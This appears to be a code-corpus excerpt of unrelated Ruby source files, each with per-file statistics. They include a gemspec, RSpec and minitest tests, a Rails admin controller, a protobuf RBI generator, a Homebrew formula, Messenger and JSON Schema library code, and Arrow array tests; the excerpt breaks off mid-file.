s.authors = ["Kannan Manickam (the original jenkins_api_client gem)",
"Yugabyte Engineering Team (improvements)"]
s.description =
"\nThis is a simple and easy-to-use Jenkins Api client with features focused on" +
"\nautomating Job configuration programaticaly. Based on the improved_jenkins_client with" +
"\nimprovements by Yugabyte engineering team."
s.email = ["[email protected]"]
s.executables = ['jenkinscli']
s.files = `git ls-files -z`.split("\x0").select { |f| f.match(%r{lib/|bin/|java_deps/|gemspec}) }
s.require_paths = ['lib']
s.homepage = 'https://github.com/yugabyte-db/improved_jenkins_client'
s.required_ruby_version = ::Gem::Requirement.new('>= 2.1')
s.rubygems_version = "2.4.5.1"
s.summary = "Improved Jenkins JSON API Client"
s.licenses = ["MIT"]
s.add_dependency 'nokogiri', '~> 1.6'
s.add_dependency 'thor', '>= 0.16.0'
s.add_dependency 'terminal-table', '>= 1.4.0'
s.add_dependency 'mixlib-shellout', '>= 1.1.0'
s.add_dependency 'socksify', '>= 1.7.0'
s.add_dependency 'json', '>= 1.0'
s.add_dependency 'addressable', '~> 2.7'
end
| 42.861111 | 107 | 0.687622 |
793ffd7bc513828831a9557c579d0d5243b72ae2 | 116 | $LOAD_PATH.unshift File.expand_path("../../lib", __FILE__)
require "uk_companies_house"
require "minitest/autorun"
| 23.2 | 58 | 0.767241 |
87e5dd58ab509689c2e3e005cbbacb20f343b06f | 1,076 | require "hand_helper"
require "rspec/its"
Hand.deck = CardDeck::Deck.new
RSpec.describe Hand do
describe "::MDHV" do
subject {Hand::MDHV}
it {is_expected.to eq 16}
end
describe ".deck" do
subject {Hand.deck}
it {is_expected.to be_an_instance_of Array}
its(:sample) {is_expected.to be_an_instance_of CardDeck::Card}
end
describe "#new" do
context "when @cards == [#{CardDeck.Card 'Jack', 'diamonds'}, #{CardDeck.Card 'Ace', 'spades'}]" do
subject {Hand.new [CardDeck.Card("Jack", 'diamonds'), CardDeck.Card("Ace", 'spades')]}
it {is_expected.to have_blackjack}
it {is_expected.to_not bust}
end
describe "hit" do
s = Hand.new
subject {s.cards}
s.hit
its(:length) {is_expected.to eq 3}
end
describe "value" do
context "when @cards == [#{CardDeck.Card 'Ace'}, #{CardDeck.Card 10}, #{CardDeck.Card 10}]" do
hand = Hand.new [CardDeck.Card('Ace'), CardDeck.Card(10), CardDeck.Card(10)]
subject {hand.value}
it {is_expected.to eq 21}
end
end
end
end
| 30.742857 | 103 | 0.631041 |
26688ec330adaa668668f9ab48100a7276333382 | 1,377 | # Copyright 2009 ThoughtWorks
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Default url mappings are:
# a controller called Main is mapped on the root of the site: /
# a controller called Something is mapped on: /something
# If you want to override this, add a line like this inside the class
# map '/otherurl'
# this will force the controller to be mounted on: /otherurl
class MainController < EscController
layout '/index'
helper :xhtml
# the index action is called automatically when no other action is specified
def index
@title = "Esc Serves Config"
end
# the string returned at the end of the function is used as the html body
# if there is no template for the action. if there is a template, the string
# is silently ignored
def notemplate
"there is no 'notemplate.xhtml' associated with this action"
end
end
| 36.236842 | 78 | 0.734931 |
79bb901d3488d2eb52fc22fbb1b904d938020e89 | 4,981 | module Facebook
module Messenger
module Incoming
#
# Message class represents an incoming Facebook Messenger message event.
# @see https://developers.facebook.com/docs/messenger-platform/reference/webhook-events/messages
#
class Message
include Facebook::Messenger::Incoming::Common
#
# @return [Array] Supported attachments for message.
ATTACHMENT_TYPES = %w[image audio video file location fallback].freeze
#
# Function returns unique id of message
# @see https://developers.facebook.com/docs/messenger-platform/reference/webhook-events/messages
# Info about received message format.
#
# @return [String] Unique id of message.
#
def id
@messaging['message']['mid']
end
def seq
@messaging['message']['seq']
end
#
# Function returns text of message
#
# @return [String] Text of message.
#
def text
@messaging['message']['text']
end
#
# Whether message is echo or not?
#
# @return [Boolean] If message is echo return true else false.
#
def echo?
@messaging['message']['is_echo']
end
#
# Function returns array containing attachment data
# @see https://developers.facebook.com/docs/messenger-platform/send-messages#sending_attachments
# More info about attachments.
#
# @return [Array] Attachment data.
#
def attachments
@messaging['message']['attachments']
end
#
# If facebook messenger built-in NLP is enabled, message will
# contain 'nlp' key in response.
# @see https://developers.facebook.com/docs/messenger-platform/built-in-nlp
# More information about built-in NLP.
#
#
# @return [Hash] NLP information about message.
#
def nlp
@messaging['message']['nlp']
end
#
# Function return app id from message.
#
# @return [String] App ID.
#
def app_id
@messaging['message']['app_id']
end
#
# This meta programming defines function for
# every attachment type to check whether the attachment
# in message is of defined type or not.
#
ATTACHMENT_TYPES.each do |attachment_type|
define_method "#{attachment_type}_attachment?" do
attachment_type?(attachment_type)
end
end
#
# Get the type of attachment in message.
#
# @return [String] Attachment type.
#
def attachment_type
return if attachments.nil?
attachments.first['type']
end
#
# Get the URL of attachment in message.
# URL is only available for attachments of type image/audio/video/file.
#
# @return [String] URL of attachment.
#
def attachment_url
return if attachments.nil?
return unless %w[image audio video file].include? attachment_type
attachments.first['payload']['url']
end
#
# Get the location coordinates if attachment type is 'location'.
# @example [LATITUDE, LONGITUDE]
#
# @return [Array] Location coordinates.
#
def location_coordinates
return [] unless attachment_type?('location')
coordinates_data = attachments.first['payload']['coordinates']
[coordinates_data['lat'], coordinates_data['long']]
end
#
# Get the payload of quick reply.
# @see https://developers.facebook.com/docs/messenger-platform/send-messages/quick-replies
# More info about quick reply.
#
# @return [String] Payload string.
#
def quick_reply
return unless @messaging['message']['quick_reply']
@messaging['message']['quick_reply']['payload']
end
def tags
messaging['message']['tags']
end
def source
messaging['message']['tags']['source']
end
def from_widget?
msg = messaging['message']
msg['tags'].present? && msg['tags']['source'].present? && msg['tags']['source'] == 'customer_chat_plugin'
end
# @private
private
#
# Check if attachment in message is of given type or not?
#
# @param [String] attachment_type Attachment type
#
# @return [Boolean] If type of attachment in message
# and provided attachment type are same then return true else false.
#
def attachment_type?(attachment_type)
!attachments.nil? && attachments.first['type'] == attachment_type
end
end
end
end
end
| 28.791908 | 115 | 0.563541 |
03835ca54f50c89e3e13366368ccfc5da99ac545 | 6,654 | # typed: strict
# frozen_string_literal: true
begin
require "google/protobuf"
rescue LoadError
return
end
module Tapioca
module Compilers
module Dsl
# `Tapioca::Compilers::Dsl::Protobuf` decorates RBI files for subclasses of
# [`Google::Protobuf::MessageExts`](https://github.com/protocolbuffers/protobuf/tree/master/ruby).
#
# For example, with the following "cart.rb" file:
#
# ~~~rb
# Google::Protobuf::DescriptorPool.generated_pool.build do
# add_file("cart.proto", :syntax => :proto3) do
# add_message "MyCart" do
# optional :shop_id, :int32, 1
# optional :customer_id, :int64, 2
# optional :number_value, :double, 3
# optional :string_value, :string, 4
# end
# end
# end
# ~~~
#
# this generator will produce the RBI file `cart.rbi` with the following content:
#
# ~~~rbi
# # cart.rbi
# # typed: strong
# class Cart
# sig { returns(Integer) }
# def customer_id; end
#
# sig { params(month: Integer).returns(Integer) }
# def customer_id=(value); end
#
# sig { returns(Integer) }
# def shop_id; end
#
# sig { params(value: Integer).returns(Integer) }
# def shop_id=(value); end
#
# sig { returns(String) }
# def string_value; end
#
# sig { params(value: String).returns(String) }
# def string_value=(value); end
#
#
# sig { returns(Float) }
# def number_value; end
#
# sig { params(value: Float).returns(Float) }
# def number_value=(value); end
# end
# ~~~
class Protobuf < Base
class Field < T::Struct
prop :name, String
prop :type, String
prop :init_type, String
prop :default, String
end
extend T::Sig
sig { override.params(root: RBI::Tree, constant: Module).void }
def decorate(root, constant)
root.create_path(constant) do |klass|
if constant == Google::Protobuf::RepeatedField
create_type_members(klass, "Elem")
elsif constant == Google::Protobuf::Map
create_type_members(klass, "Key", "Value")
else
descriptor = T.let(T.unsafe(constant).descriptor, Google::Protobuf::Descriptor)
fields = descriptor.map { |desc| create_descriptor_method(klass, desc) }
fields.sort_by!(&:name)
parameters = fields.map do |field|
create_kw_opt_param(field.name, type: field.init_type, default: field.default)
end
klass.create_method("initialize", parameters: parameters, return_type: "void")
end
end
end
sig { override.returns(T::Enumerable[Module]) }
def gather_constants
marker = Google::Protobuf::MessageExts::ClassMethods
results = T.cast(ObjectSpace.each_object(marker).to_a, T::Array[Module])
results.any? ? results + [Google::Protobuf::RepeatedField, Google::Protobuf::Map] : []
end
private
sig { params(klass: RBI::Scope, names: String).void }
def create_type_members(klass, *names)
klass.create_extend("T::Generic")
names.each do |name|
klass.create_type_member(name)
end
end
sig do
params(
descriptor: Google::Protobuf::FieldDescriptor
).returns(String)
end
def type_of(descriptor)
case descriptor.type
when :enum
descriptor.subtype.enummodule.name
when :message
descriptor.subtype.msgclass.name
when :int32, :int64, :uint32, :uint64
"Integer"
when :double, :float
"Float"
when :bool
"T::Boolean"
when :string, :bytes
"String"
else
"T.untyped"
end
end
sig { params(descriptor: Google::Protobuf::FieldDescriptor).returns(Field) }
def field_of(descriptor)
if descriptor.label == :repeated
# Here we're going to check if the submsg_name is named according to
# how Google names map entries.
# https://github.com/protocolbuffers/protobuf/blob/f82e26/ruby/ext/google/protobuf_c/defs.c#L1963-L1966
if descriptor.submsg_name.to_s.end_with?("_MapEntry_#{descriptor.name}")
key = descriptor.subtype.lookup("key")
value = descriptor.subtype.lookup("value")
key_type = type_of(key)
value_type = type_of(value)
type = "Google::Protobuf::Map[#{key_type}, #{value_type}]"
default_args = [key.type.inspect, value.type.inspect]
default_args << value_type if [:enum, :message].include?(value.type)
Field.new(
name: descriptor.name,
type: type,
init_type: "T.any(#{type}, T::Hash[#{key_type}, #{value_type}])",
default: "Google::Protobuf::Map.new(#{default_args.join(", ")})"
)
else
elem_type = type_of(descriptor)
type = "Google::Protobuf::RepeatedField[#{elem_type}]"
default_args = [descriptor.type.inspect]
default_args << elem_type if [:enum, :message].include?(descriptor.type)
Field.new(
name: descriptor.name,
type: type,
init_type: "T.any(#{type}, T::Array[#{elem_type}])",
default: "Google::Protobuf::RepeatedField.new(#{default_args.join(", ")})"
)
end
else
type = type_of(descriptor)
Field.new(
name: descriptor.name,
type: type,
init_type: type,
default: "nil"
)
end
end
sig do
params(
klass: RBI::Scope,
desc: Google::Protobuf::FieldDescriptor,
).returns(Field)
end
def create_descriptor_method(klass, desc)
field = field_of(desc)
klass.create_method(
field.name,
return_type: field.type
)
klass.create_method(
"#{field.name}=",
parameters: [create_param("value", type: field.type)],
return_type: field.type
)
field
end
end
end
end
end
| 31.535545 | 115 | 0.537872 |
21f9ecd200672e8bca804aa5f287ffffa98b8648 | 6,559 | # VL 2014 -- VL Verilog Toolkit, 2014 Edition
# Copyright (C) 2008-2015 Centaur Technology
#
# Contact:
# Centaur Technology Formal Verification Group
# 7600-C N. Capital of Texas Highway, Suite 300, Austin, TX 78731, USA.
# http://www.centtech.com/
#
# License: (An MIT/X11-style license)
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
#
# Original author: Jared Davis <[email protected]>
require_relative '../utils'
outlaw_bad_warnings()
# BOZO whaaat is going on here??
# outlaw_warning_global("VL-PROGRAMMING-ERROR")
def unset(modname, wirename)
# It's okay for it to be unset and unused, because some bits may be unset
# while other bits may be unused. However, nothing should ever be marked
# as both unset and spurious.
match_warning(modname, "VL-LUCID-UNSET", wirename)
outlaw_warning(modname, "VL-LUCID-SPURIOUS", wirename)
end
def unused(modname, wirename)
# It's okay for it to be unset and unused, because some bits may be unset
# while other bits may be unused. However, nothing should ever be marked as
# both unused and spurious.
match_warning(modname, "VL-LUCID-UNUSED", wirename)
outlaw_warning(modname, "VL-LUCID-SPURIOUS", wirename)
end
def spurious(modname, wirename)
match_warning(modname, "VL-LUCID-SPURIOUS", wirename)
outlaw_warning(modname, "VL-LUCID-UNSET", wirename)
outlaw_warning(modname, "VL-LUCID-UNUSED", wirename)
end
def normal(modname, wirename)
outlaw_warning(modname, "VL-LUCID-SPURIOUS", wirename)
outlaw_warning(modname, "VL-LUCID-UNSET", wirename)
outlaw_warning(modname, "VL-LUCID-UNUSED", wirename)
end
normal(:"Design Root", "top_normal ")
spurious(:"Design Root", "top_spurious ")
unset(:"Design Root", "top_unset ")
unused(:"Design Root", "top_unused ")
normal(:m0, "w1_normal ")
spurious(:m0, "w1_spurious ")
unset(:m0, "w1_unset ")
unused(:m0, "w1_unused ")
unused(:"Design Root", "Type top_unused_t ")
normal(:"Design Root", "Type top_used_t ")
unused(:"Design Root", "Function top_f_unused ")
normal(:"Design Root", "Function top_f_used ")
normal(:m1, "myout ")
normal(:m2, "l1_normal ")
spurious(:m2, "l1_spurious ")
unset(:m2, "l1_unset ")
unused(:m2, "l1_unused ")
normal(:m3, "delay ")
unset(:m3, "clk ")
spurious(:m3, "r1_spurious ")
unset(:m3, "r1_unset ")
normal(:m3, "r1_normal ")
unused(:m3, "r1_unused ")
normal(:"Design Root", "Type opcode_t ")
unused(:"Design Root", "Type instruction_t ")
normal(:pkg1, "p1_normal ")
unset(:pkg1, "p1_unset ")
unused(:pkg1, "p1_unused ")
spurious(:pkg1, "p1_spurious ")
unset(:pkg1, "pr1_unset ")
unset(:pkg1, "pr2_unset ")
unused(:pkg1, "pr1_unused ")
unused(:pkg1, "pr2_unused ")
normal(:pkg1, "pr1_normal ")
normal(:pkg1, "pr2_normal ")
normal(:pkg1, "Function pfn_used ")
unused(:pkg1, "Function pfn_unused ")
normal(:m4, "u1 ")
normal(:m4, "u2 ")
unused(:"Design Root", "Function noreturn ")
unused(:"Design Root", "nr_unused ")
unset(:"Design Root", "noreturn ")
normal(:m5, "width ")
unused(:m5, "m5_unused ")
unset(:m5, "m5_unset ")
unset(:m5, "doublebad ")
unused(:m5, "doublebad ")
normal(:m6, "width ")
normal(:m6, "xout ")
normal(:m6, "xin ")
unset(:m6, "foo ")
unused(:m7, "unused1 ")
unused(:m7, "unused2 ")
unused(:m7, "unused3 ")
unset(:m7, "unset1 ")
unset(:m7, "unset2 ")
unset(:m7, "unset3 ")
normal(:m8sub, "outtrans ");
normal(:m8sub, "intrans ");
normal(:m8, "normal_trans ")
unset(:m8, "unset_trans ")
unused(:m8, "unused_trans ")
spurious(:m8, "spurious_trans ")
unused(:m8, "xx0 ")
unused(:m8, "xx1 ")
unused(:m8, "subout ");
unset(:m8, "subin ");
normal(:MemReq, "w1_normal ")
unset(:MemReq, "w1_unset ")
unused(:MemReq, "w1_unused ")
unset(:MemReq, "w1_partial_unset ")
unused(:MemReq, "w1_partial_unused ")
spurious(:MemReq, "w1_spurious")
normal(:m9write, "foo ")
normal(:m9read, "foo ")
unused(:m9read, "blah ")
normal(:m9writewrap, "foo ")
normal(:m9readwrap, "foo ")
normal(:m9, "mr_used1 ")
normal(:m9, "mr_used2 ")
spurious(:m9, "mr_spurious ")
spurious(:mh1, "w1_spurious ")
normal(:mh1, "w1_normal ")
unused(:mh1, "w1_unused ")
unset(:mh1, "w1_unset ")
normal(:idx1, "normal1 ")
normal(:idx1, "normal2 ")
normal(:idx1, "normal3 ")
normal(:idx1, "a1 ")
normal(:idx1, "a2 ")
unused(:idx1, "unused1 ")
unused(:idx1, "unused2 ")
unused(:idx1, "unused3 ")
spurious(:dsInterface, "dsi_spurious")
normal(:dsInterface, "dsi_normal")
unused(:dsInterface, "dsi_unused")
unset(:dsInterface, "dsi_unset")
normal(:dotstar, "out1 ")
normal(:dotstar, "out2 ")
normal(:dotstar, "in1 ")
normal(:dotstar, "in2 ")
normal(:dotstar, "dsi ")
unused(:dotstarwrap, "out1 ")
unused(:dotstarwrap, "out2 ")
unset(:dotstarwrap, "in1 ")
unset(:dotstarwrap, "in2 ")
normal(:dotstar, "dsi ")
spurious(:ImPort, "dataSpurious ")
spurious(:ImPort, "reqMain ")
unused(:ImPort, "dataVld ")
unused(:ImPort, "dataMain ")
unset(:ImPort, "reqVld ")
normal(:imserve, "w1_normal ")
spurious(:imserve, "w1_spurious ")
unset(:imserve, "w1_unset ")
unused(:imserve, "w1_unused ")
normal(:imserve, "foo ")
normal(:imserve, "bar ")
normal(:imservewrap, "foo ")
normal(:imservewrap, "bar ")
normal(:imservewrap, "port1 ")
normal(:imservewrap, "port2 ")
unset(:imsim, "foo ")
unused(:imsim, "bar ")
normal(:imsim, "port1 ")
normal(:imsim, "port2 ")
# I know these don't work yet
#normal(:mg1, "p1_used ")
#normal(:mg1, "w1_normal ")
unset(:useprim, "w1_unset ")
unused(:useprim, "w1_unused ")
spurious(:useprim, "w1_spurious ")
unused(:trickyscope, "counter_unused ")
unset(:minuscolon, "normal2")
unused(:minuscolon, "normal1")
test_passed()
| 26.554656 | 79 | 0.700412 |
b99c02351d0c2514b50fdd58eeff28cf0984bebe | 1,403 | # frozen_string_literal: true
require 'spec_helper'
describe Banzai::ReferenceParser::MentionedProjectParser do
include ReferenceParserHelpers
let(:group) { create(:group, :private) }
let(:user) { create(:user) }
let(:new_user) { create(:user) }
let(:project) { create(:project, group: group, creator: user) }
let(:link) { empty_html_link }
subject { described_class.new(Banzai::RenderContext.new(project, new_user)) }
describe '#gather_references' do
context 'when the link has a data-project attribute' do
context 'using an existing project ID where user does not have access' do
it 'returns empty Array' do
link['data-project'] = project.id.to_s
expect_gathered_references(subject.gather_references([link]), [], 1)
end
end
context 'using an existing project ID' do
before do
link['data-project'] = project.id.to_s
project.add_developer(new_user)
end
it 'returns an Array of referenced projects' do
expect_gathered_references(subject.gather_references([link]), [project], 0)
end
end
context 'using a non-existing project ID' do
it 'returns an empty Array' do
link['data-project'] = 'inexisting-project-id'
expect_gathered_references(subject.gather_references([link]), [], 1)
end
end
end
end
end
| 29.851064 | 85 | 0.659301 |
f7fb59642a894e1f47fcd83a354b60161c873fb8 | 1,146 | class Urweb < Formula
desc "Ur/Web programming language"
homepage "http://www.impredicative.com/ur/"
url "http://www.impredicative.com/ur/urweb-20170105.tgz"
sha256 "2ad3aea2c4851c9b18f752d38c7127af8293fbbbbdb3dd06b73a4603fe399b67"
bottle do
sha256 "5f406928ad3e00bc835b7b04e29a9a3edad0e727ebc5e16c650a72bed19d8766" => :sierra
sha256 "f98d2b47c5736ef2a2e014933e16d09f9a9a32d4668fd5f022032510df6494e3" => :el_capitan
sha256 "116d3adc41454c84331d646094bc73857f9ba8020cce7891b67d5d03d458da7d" => :yosemite
end
depends_on "autoconf" => :build
depends_on "automake" => :build
depends_on "libtool" => :build
depends_on "mlton" => :build
depends_on "openssl"
depends_on "gmp"
depends_on :postgresql => :optional
depends_on :mysql => :optional
def install
args = %W[
--disable-debug
--disable-dependency-tracking
--disable-silent-rules
--with-openssl=#{Formula["openssl"].opt_prefix}
--prefix=#{prefix}
SITELISP=$prefix/share/emacs/site-lisp/urweb
]
system "./configure", *args
system "make", "install"
end
test do
system "#{bin}/urweb"
end
end
| 28.65 | 92 | 0.719895 |
fffd71d69f5a53aa6b1cc690685cbfa2e6f6208b | 979 | # frozen_string_literal: true
module LabelPrintingApp
# Apply an instance's values to a label template's variable rules and produce a preview image of it.
class PreviewLabel < BaseService
include LabelContent
attr_reader :label_name, :instance
def initialize(label_name, instance, supporting_data = {})
@label_name = label_name
@instance = instance
@supporting_data = supporting_data
raise ArgumentError if label_name.nil?
end
def call
lbl_required = fields_for_label
vars = values_from(lbl_required)
messerver_preview(vars)
rescue Crossbeams::FrameworkError => e
failed_response(e.message)
end
private
def messerver_preview(vars)
mes_repo = MesserverApp::MesserverRepo.new
res = mes_repo.preview_published_label(label_name, vars)
return res unless res.success
success_response('ok', OpenStruct.new(fname: 'preview_lbl', body: res.instance))
end
end
end
| 27.194444 | 102 | 0.716037 |
0896142d2e067ee8f0e9a22d2da60271e009dbad | 140 | require 'test_helper'
class BigosMenuBoxTest < ActiveSupport::TestCase
test "truth" do
assert_kind_of Module, BigosMenuBox
end
end
| 17.5 | 48 | 0.778571 |
1df0623bedb70ffdd1234dc1c1c05c353ea6d253 | 1,726 | require 'pathname'
module JSON
class Schema
attr_accessor :schema, :uri, :validator
def initialize(schema,uri,parent_validator=nil)
@schema = schema
@uri = uri
# If there is an ID on this schema, use it to generate the URI
if @schema['id'] && @schema['id'].kind_of?(String)
temp_uri = JSON::Util::URI.parse(@schema['id'])
if temp_uri.relative?
temp_uri = uri.join(temp_uri)
end
@uri = temp_uri
end
@uri = JSON::Util::URI.strip_fragment(@uri)
# If there is a $schema on this schema, use it to determine which validator to use
if @schema['$schema']
@validator = JSON::Validator.validator_for(@schema['$schema'])
elsif parent_validator
@validator = parent_validator
else
@validator = JSON::Validator.default_validator
end
end
def validate(data, fragments, processor, options = {})
@validator.validate(self, data, fragments, processor, options)
end
def self.stringify(schema)
case schema
when Hash then
Hash[schema.map { |key, value| [key.to_s, stringify(schema[key])] }]
when Array then
schema.map do |schema_item|
stringify(schema_item)
end
when Symbol then
schema.to_s
else
schema
end
end
# @return [JSON::Schema] a new schema matching an array whose items all match this schema.
def to_array_schema
array_schema = { 'type' => 'array', 'items' => schema }
array_schema['$schema'] = schema['$schema'] unless schema['$schema'].nil?
JSON::Schema.new(array_schema, uri, validator)
end
def to_s
@schema.to_json
end
end
end
| 27.396825 | 94 | 0.615875 |
ab23f29387a604c76805fb361f82f35843743a61 | 1,793 | # require_dependency "pack/application_controller"
module Pack
class Admin::PackagesController < Admin::ApplicationController
def index
respond_to do |format|
format.html{
@q_form = OpenStruct.new(q_param)
search = PackSearch.new(@q_form.to_h, 'packages')
@packages = search.get_results(nil)
without_pagination(:packages)
} # index.html.erb
format.json do
@packages = Package.finder(params[:q])
render json: { records: @packages.page(params[:page]).per(params[:per]), total: @packages.count }
end
end
end
def show
@package = Package.find(params[:id])
@versions = @package.versions.page(params[:page]).per(@per).includes(clustervers: :core_cluster)
end
def new
@package = Package.new
end
def create
@package = Package.new(package_params)
if @package.save
redirect_to admin_package_path(@package.id)
else
render :new
end
end
def edit
@package = Package.find(params[:id])
end
def update
@package = Package.find(params[:id])
if @package.update(package_params)
redirect_to admin_package_path(@package.id)
else
render :edit
end
end
def destroy
@package = Package.find(params[:id])
@package.destroy
redirect_to admin_packages_path
end
private
def package_params
params.require(:package)
.permit(*Package.locale_columns(:description, :name),
:deleted, :lock_version, :accesses_to_package)
end
def search_params
params.require(:search).permit(:deleted)
end
def q_param
params[:q] || { clustervers_active_in: '1' }
end
end
end
| 23.906667 | 107 | 0.615728 |
6af378b27f84544f50723663634a274833d6d0d9 | 56 | require 'spec_helper'
describe Tradier::Balance do
end
| 11.2 | 28 | 0.803571 |
6a7c42b3abcea87e3ab80e4f929a9f79c0c78a16 | 910 | module Spree
module Api
module V2
module Storefront
module Account
class CreditCardsController < ::Spree::Api::V2::ResourceController
before_action :require_spree_current_user
private
def model_class
Spree::CreditCard
end
def collection_serializer
Spree::Api::Dependencies.storefront_credit_card_serializer.constantize
end
def collection_finder
Spree::Api::Dependencies.storefront_credit_card_finder.constantize
end
def resource_serializer
Spree::Api::Dependencies.storefront_credit_card_serializer.constantize
end
def resource_finder
Spree::Api::Dependencies.storefront_credit_card_finder.constantize
end
end
end
end
end
end
end
| 25.277778 | 84 | 0.605495 |
4ae067763d8f06b5c4a30bd6963f4601d9f435fb | 1,356 | # Copyright (c) 2018-2019 VMware, Inc. All Rights Reserved.
# SPDX-License-Identifier: MIT
# DO NOT MODIFY. THIS CODE IS GENERATED. CHANGES WILL BE OVERWRITTEN.
# vapi - vAPI is an extensible API Platform for modelling and delivering APIs/SDKs/CLIs.
require 'spec_helper'
require 'json'
require 'date'
# Unit tests for VSphereAutomation::VAPI::VapiMetadataCliCommandOutputInfo
# Automatically generated by openapi-generator (https://openapi-generator.tech)
# Please update as you see appropriate
describe 'VapiMetadataCliCommandOutputInfo' do
before do
# run before each test
@instance = VSphereAutomation::VAPI::VapiMetadataCliCommandOutputInfo.new
end
after do
# run after each test
end
describe 'test an instance of VapiMetadataCliCommandOutputInfo' do
it 'should create an instance of VapiMetadataCliCommandOutputInfo' do
expect(@instance).to be_instance_of(VSphereAutomation::VAPI::VapiMetadataCliCommandOutputInfo)
end
end
describe 'test attribute "structure_id"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "output_fields"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
end
| 30.818182 | 102 | 0.758112 |
bb70fb52a0473a8d1143332a749fac2621d498bd | 317 | cask "fantasy-grounds" do
version :latest
sha256 :no_check
url "https://www.fantasygrounds.com/filelibrary/FantasyGrounds.dmg"
name "Fantasy Grounds"
homepage "https://www.fantasygrounds.com/home/home.php"
app "Fantasy Grounds.app"
zap trash: "~/Library/Saved Application State/Fantasy Grounds*"
end
| 24.384615 | 69 | 0.750789 |
aba56e11a20be0c57e819a95fb2c92421762f307 | 421 | ENV["RAILS_ENV"] ||= 'test'
require 'minitest/spec'
require 'minitest/autorun'
require "minitest/reporters"
MiniTest::Reporters.use!
require 'debugger'
require './lib/readouts'
Dir[File.join(APP_ROOT,"spec/support/**/*.rb")].each {|f| require f }
Dir.glob(File.join(APP_ROOT, 'lib/**/*.rb')).each {|f| require f}
include Readouts
require 'mustard'
# other niceities
Mustard.matcher(:be_true) { instance_of?TrueClass}
| 23.388889 | 69 | 0.72209 |
e819316b5a61e5a36245817bb4a124358a0d3eeb | 100 | $LOAD_PATH.unshift File.expand_path('../../lib', __FILE__)
require_relative "../lib/tic_tac_toe.rb"
| 33.333333 | 58 | 0.74 |
084d3f794eb5cc10bcd3380192a268f10eb42592 | 1,657 | # -*- encoding: utf-8 -*-
# rubocop:disable all
$LOAD_PATH.push File.expand_path("../lib", __FILE__)
author_name = "PikachuEXE"
gem_name = "active_record_tweaks"
require "#{gem_name}/version"
Gem::Specification.new do |s|
s.platform = Gem::Platform::RUBY
s.name = gem_name
s.version = ActiveRecordTweaks::VERSION
s.summary = "Some Tweaks for ActiveRecord"
s.description = <<-DOC
ActiveRecord is great, but could be better. Here are some tweaks for it.
DOC
s.license = "MIT"
s.authors = [author_name]
s.email = ["[email protected]"]
s.homepage = "http://github.com/#{author_name}/#{gem_name}"
s.files = `git ls-files`.split("\n")
s.test_files = `git ls-files -- {test,spec,features}/*`.split("\n")
s.executables = `git ls-files -- bin/*`.split("\n").map { |f| File.basename(f) }
s.require_paths = ["lib"]
s.add_dependency "activerecord", ">= 5.2.0", "< 7.0.0"
s.add_development_dependency "bundler", ">= 1.0.0"
s.add_development_dependency "rake", ">= 10.0", "<= 14.0"
s.add_development_dependency "appraisal", "~> 2.0"
s.add_development_dependency "rspec", "~> 3.0"
s.add_development_dependency "rspec-its", "~> 1.0"
s.add_development_dependency "sqlite3", ">= 1.3"
s.add_development_dependency "database_cleaner", ">= 1.0"
s.add_development_dependency "simplecov", ">= 0.21"
s.add_development_dependency "simplecov-lcov", ">= 0.8"
s.add_development_dependency "gem-release", ">= 0.7"
s.add_development_dependency "timecop", ">= 0.7.1"
s.required_ruby_version = ">= 2.4.0"
s.required_rubygems_version = ">= 1.4.0"
end
| 34.520833 | 84 | 0.648763 |
115656b7d761ff64b7df318f38bb2d7c4d8d7112 | 7,730 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
module ValuesDictionaryArrayTests
def test_null
target = build(Arrow::NullArray.new(4))
assert_equal([nil] * 4, target.values)
end
def test_boolean
values = [true, nil, false]
target = build(Arrow::BooleanArray.new(values))
assert_equal(values, target.values)
end
def test_int8
values = [
-(2 ** 7),
nil,
(2 ** 7) - 1,
]
target = build(Arrow::Int8Array.new(values))
assert_equal(values, target.values)
end
def test_uint8
values = [
0,
nil,
(2 ** 8) - 1,
]
target = build(Arrow::UInt8Array.new(values))
assert_equal(values, target.values)
end
def test_int16
values = [
-(2 ** 15),
nil,
(2 ** 15) - 1,
]
target = build(Arrow::Int16Array.new(values))
assert_equal(values, target.values)
end
def test_uint16
values = [
0,
nil,
(2 ** 16) - 1,
]
target = build(Arrow::UInt16Array.new(values))
assert_equal(values, target.values)
end
def test_int32
values = [
-(2 ** 31),
nil,
(2 ** 31) - 1,
]
target = build(Arrow::Int32Array.new(values))
assert_equal(values, target.values)
end
def test_uint32
values = [
0,
nil,
(2 ** 32) - 1,
]
target = build(Arrow::UInt32Array.new(values))
